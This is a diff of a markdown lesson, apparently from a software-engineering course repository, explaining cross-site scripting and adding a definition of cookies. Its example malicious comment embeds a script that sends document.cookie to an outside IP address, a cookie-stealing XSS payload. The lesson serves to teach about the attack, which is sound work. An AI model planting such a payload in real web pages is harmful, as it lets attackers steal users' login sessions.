se-edu/learningresources/contents/security/crossSiteScripting/crossSiteScripting.md

 Good photograph! <br>
 I **like** your photograph!

-HTML also supports `<script>`, for you to write JavaScript code on the webpage as well.
+HTML also supports `<script>`, for you to write `JavaScript` code on the webpage as well.

 *In HTML, anything between `<script>` and `</script>` will be run as `JavaScript`.*

 What happens when a malicious user submits the following as a comment?

+> A **cookie** is a piece of data sent from the server and stored on the client's computer.
+It can contain sensitive information such as login data.

 ```html
 This is an innocent looking comment. <script>sendToServer("http://139.241.0.3/", document.cookie)</script>
 ```